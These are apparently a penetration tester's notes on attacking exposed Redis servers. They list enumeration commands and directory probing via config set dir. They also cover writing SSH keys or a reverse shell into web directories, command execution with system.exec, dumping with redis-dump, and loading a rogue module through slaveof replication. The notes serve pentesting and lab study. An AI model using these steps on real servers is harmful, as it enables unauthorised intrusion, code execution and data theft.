- Runs on port 6379 — needs a full nmap scan!
- If conection is possible via telnet, useful commands are:
- info
- CONFIG GET *
- all keys: keys *
- It is possible to determine which directories exist:
-
config set dir /var/www/htdocs -ERR Changing directory: No such file or directory set dir /var/www +OK set dir /var/www/html +OK
-
- Upload SSH key via redis if there is write access to an user. An username has to been known.
- Hint: if there is any writeable directory which is available via a web server, try the SSH writing method to write a reverse shell file somewhere to a web server directory.
- Execute commands with
-
system.exec "id"
-
- Complete list of commands
- See
- DON’T use telnet / nc / … Use redis-cli ‑h <ip> to connect.
- Use redis-dump to dump a badly configured redis instance
-
npm install redis-dump -g redis-dump -h 10.10.10.160 --json
-
Master/slave configuration
In the master/slave configuration, there is one master which allows only write access and n slaves which allow only read access.
Important: The master must not be in the protected mode.
- If he can restarted or the config file can be changed, set the –protected-mode no flag.
- If not:
- On the master: Set the password with
-
config set requirepass mypass
-
- On the slave: Set the master’s password with
-
config set masterauth mypass
-
- If a system want’s the password after logging in into the shell again, use the following to authenticate:
-
auth mypass
-
- On the master: Set the password with
Make a node a master (default):
redis> slaveof no one
Make a node a slave:
redis> slaveof <master_ip> <master_port>
The process is the following, see also the redis-rogue-server script, which needs the addition of the Command module.
- Set to slave
- Set output db file to module filename
- Perform sync, pass the module’s binary date escaped
- Load the module
- Set to master
Now the module is inserted. Note: The module exp.so has to be compiled for the correct architecture.
Leave a Reply
You must be logged in to post a comment.